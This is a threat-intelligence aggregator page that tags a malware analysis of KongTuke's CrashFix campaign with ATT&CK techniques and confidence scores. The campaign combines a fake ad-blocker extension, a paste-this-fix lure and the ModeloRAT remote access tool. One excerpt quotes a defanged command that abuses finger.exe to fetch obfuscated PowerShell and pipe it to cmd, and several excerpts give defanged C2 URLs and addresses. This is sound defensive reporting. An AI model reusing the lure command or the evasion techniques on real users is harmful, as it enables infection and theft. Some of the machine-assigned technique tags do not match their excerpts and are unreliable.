TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

Dissecting CrashFix: KongTuke's New Toy

2026-01-16 · Read original ↗

ATT&CK techniques detected

32 predictions
T1059.001PowerShell
99%
"c start " " / min cmd / c " copy % windir % \ system32 \ finger. exe % temp % \ ct. exe & % temp % \ ct. exe [ email protected ] [. ] 108 | cmd " upon execution, the finger command retrieves a large charcode blob containing obfuscated powershell using rot cipher encoding. once de…"
T1547.001Registry Run Keys / Startup Folder
99%
", defaulting to 150 milliseconds. after six or more consecutive communication failures, the rat backs off to an extended interval of 900 seconds ( 15 minutes ) to avoid detection. when recovering from a single communication failure, it uses a reconnection interval of 150 seconds …"
T1568.002Domain Generation Algorithms
97%
"##dbg, dnspy, immunity debugger, hyperdbg, cheat engine, and ida. if any match, the process gets closed, and the check returns true. figure 28 : excityimpatchscableterrine function once the dga spits out domains, the loader constructs its callback url : - hxxp : / / [ dga _ domai…"
T1027Obfuscated Files or Information
97%
"different encrypted blobs, both using the same salt and password for aes, then xor ' d together to produce the final plaintext. layer 2 : xor ( because why not? ) after aes decryption spits out a base64 string, it goes through a second round, this time a simple xor cipher : the x…"
T1059.001PowerShell
95%
"host " test payload!!!! ". either the threat actor has a sense of humor, or the campaign is in the testing phase. conclusion kongtuke ' s crashfix campaign demonstrates how threat actors continue to evolve their social engineering tactics. by impersonating a trusted open - source…"
T1027Obfuscated Files or Information
95%
"256 in cbc mode with pbkdf2 key derivation : the password and salt are stored as static byte arrays within < module >. < > c inside that < > c struct, there are dozens of byte arrays with names like : - set _ avataricon getgroups getassembliesfromdirectory. parseuint64 ( cipherte…"
T1027Obfuscated Files or Information
95%
"obfuscation through verbosity, where all class names, methods, and variables use unnecessarily long, pseudo - technical names such as instruction _ result _ repository instead of simply results. this significantly increases cognitive load during manual analysis. obfuscation and a…"
T1176Software Extensions
92%
"beacon url : - hxxps : / / nexsnield [. ] com / update? uuid = 550e8400 - e29b - 41d4 - a716 - 446655440000 & version = 2025. 1116. 1842 & previous = 2025. 1115. 1000 figure 10 : update beacon transmitting uuid, current version, and previous version to c2 server the extension set…"
T1071.001Web Protocols
92%
"it also performs privilege detection to determine if running as system, administrator, or standard user, and can execute arbitrary powershell commands with a 30 - second timeout and 10mb output limit. persistence is achieved by writing to the hkcu \ software \ microsoft \ windows…"
T1176.001Browser Extensions
89%
"yourself from malvertising, malicious advertisements that deliver malware through legitimate ad networks. our victim likely just wanted to get rid of annoying ads. instead, they downloaded a malicious one ( nexshield ) while searching for an ad blocker for chrome. figure 3 : mali…"
T1204.004Malicious Copy and Paste
88%
"user is presented with a fake “ security issues detected ” alert and instructed to manually “ fix ” the issue by opening the windows run dialog ( win + r ), pasting from their clipboard ( ctrl + v ), and pressing enter. the malicious extension silently copies a powershell command…"
T1176.001Browser Extensions
87%
"beacon url : - hxxps : / / nexsnield [. ] com / update? uuid = 550e8400 - e29b - 41d4 - a716 - 446655440000 & version = 2025. 1116. 1842 & previous = 2025. 1115. 1000 figure 10 : update beacon transmitting uuid, current version, and previous version to c2 server the extension set…"
T1568.002Domain Generation Algorithms
82%
") stage 5 delivers even more powershell and even more obfuscation. at this point, you might be wondering if kongtuke gets paid by the layer. fortunately, automation saves us from manually calculating hundreds of nested expressions like ( - 8953 + ( 2890 + 6179 ) ) just to reveal …"
T1059.001PowerShell
82%
"##t also includes junk code functions at the end of the file designed to confuse static analysis tools and analysts. modelorat is organized into four primary classes : - unnecessarilyprolongedcryptographicmechanismimplementationclass is a straightforward rc4 stream cipher impleme…"
T1071.001Web Protocols
78%
"##block ` with ` nexshield `. figure 5 : nexshield header reference comparing the “ 2025. 1116. 1841 ” release of ublock origin lite to the version of nexshield that was live on the chrome web store on january 14, which they called “ 2025. 1116. 1842 ”, shows that the two are nea…"
T1176Software Extensions
76%
"name uses nexshield ( with an “ h ” ). uuid generation is a common practice for legitimate extensions to track basic analytics. however, in this case, the uuid is sent to attacker - controlled infrastructure ( nexsnield [. ] com ) and is used to correlate install, update, and uni…"
T1176Software Extensions
74%
"yourself from malvertising, malicious advertisements that deliver malware through legitimate ad networks. our victim likely just wanted to get rid of annoying ads. instead, they downloaded a malicious one ( nexshield ) while searching for an ad blocker for chrome. figure 3 : mali…"
T1059.006Python
73%
", and sensitive data, get the vip treatment : modelorat, a fully - featured python rat with rc4 - encrypted c2 communications, and support for dropping executables, dlls, and python scripts. the rat even tries to blend in by naming its persistence entries after legitimate softwar…"
T1059.003Windows Command Shell
62%
"shift + i / j / c ), disables right - click context menus, and prevents text selection and dragging. figure 17 : anti - analysis techniques blocking devtools shortcuts, right - click, and text selection kongtuke ’ s new toy kongtuke started using “ finger ” in december of 2025. f…"
T1204.002Malicious File
57%
"user is presented with a fake “ security issues detected ” alert and instructed to manually “ fix ” the issue by opening the windows run dialog ( win + r ), pasting from their clipboard ( ctrl + v ), and pressing enter. the malicious extension silently copies a powershell command…"
T1059.001PowerShell
54%
"user is presented with a fake “ security issues detected ” alert and instructed to manually “ fix ” the issue by opening the windows run dialog ( win + r ), pasting from their clipboard ( ctrl + v ), and pressing enter. the malicious extension silently copies a powershell command…"
T1071.001Web Protocols
51%
". ] 208 and 158. 247. 252 [. ] 178. the beacon url follows the pattern http : / / { c2 _ ip } : 80 / beacon / { client _ id }. the communication flow begins when the client collects system metadata and serializes it to json. the data is then rc4 - encrypted with a random key, and…"
T1059.001PowerShell
48%
"it also performs privilege detection to determine if running as system, administrator, or standard user, and can execute arbitrary powershell commands with a 30 - second timeout and 10mb output limit. persistence is achieved by writing to the hkcu \ software \ microsoft \ windows…"
T1497.001System Checks
42%
"triggers adds a specific value. anti - analysis checks : - username / hostname in a blacklist ( things like “ malware ”, “ sandbox ”, the infamous “ john doe ” )? add 54 billion. - debugger window detected? add 56 billion. - running in virtualbox? add 52 billion. - vmware? add 32…"
T1176.001Browser Extensions
42%
"dissecting crashfix : kongtuke ' s new toy summary in january 2026, huntress senior security operations analyst tanner filip observed threat actors using a malicious browser extension to display a fake security warning, claiming the browser had " stopped abnormally " and promptin…"
T1497Virtualization/Sandbox Evasion
42%
"triggers adds a specific value. anti - analysis checks : - username / hostname in a blacklist ( things like “ malware ”, “ sandbox ”, the infamous “ john doe ” )? add 54 billion. - debugger window detected? add 56 billion. - running in virtualbox? add 52 billion. - vmware? add 32…"
T1027Obfuscated Files or Information
40%
"payload opening the dll payload in dnspy, you might see something like this : figure 27 : nested string decryption calls resolving sandbox dll names for detection the < module >. < > c stuff? that ' s where all the encrypted data lives. the kongtuke author is storing their byte a…"
T1583.001Domains
37%
"yourself from malvertising, malicious advertisements that deliver malware through legitimate ad networks. our victim likely just wanted to get rid of annoying ads. instead, they downloaded a malicious one ( nexshield ) while searching for an ad blocker for chrome. figure 3 : mali…"
T1553.001Gatekeeper Bypass
33%
"server smart enough to filter out researchers based on a numeric fingerprint score. if your system doesn ' t look like a legitimate victim, you get nothing. for defenders, this campaign reinforces several key points : monitor for unusual use of lolbins like finger. exe, watch for…"
T1055.001Dynamic-link Library Injection
32%
"##d111 for workgroup machines, bcda222 for domain - joined - installed antivirus products ( queried from securitycenter2 ) the response is piped directly to iex ( invoke - expression ), executing whatever the c2 returns. figure 20 : anti - analysis process check and victim profil…"
T1218.011Rundll32
32%
"shift + i / j / c ), disables right - click context menus, and prevents text selection and dragging. figure 17 : anti - analysis techniques blocking devtools shortcuts, right - click, and text selection kongtuke ’ s new toy kongtuke started using “ finger ” in december of 2025. f…"
T1059.001PowerShell
31%
"overwrites it with 0xc3, a single ret instruction, causing the function to return immediately without scanning. after fingerprinting, the script generates a pseudo - random. top domain using a seed based on the current day of year. the key parameter contains the accumulated finge…"

Summary

Fake ad blocker crashes your browser, then offers a "fix." Go inside KongTuke's CrashFix campaign, from malicious extension to ModeloRAT for VIP targets.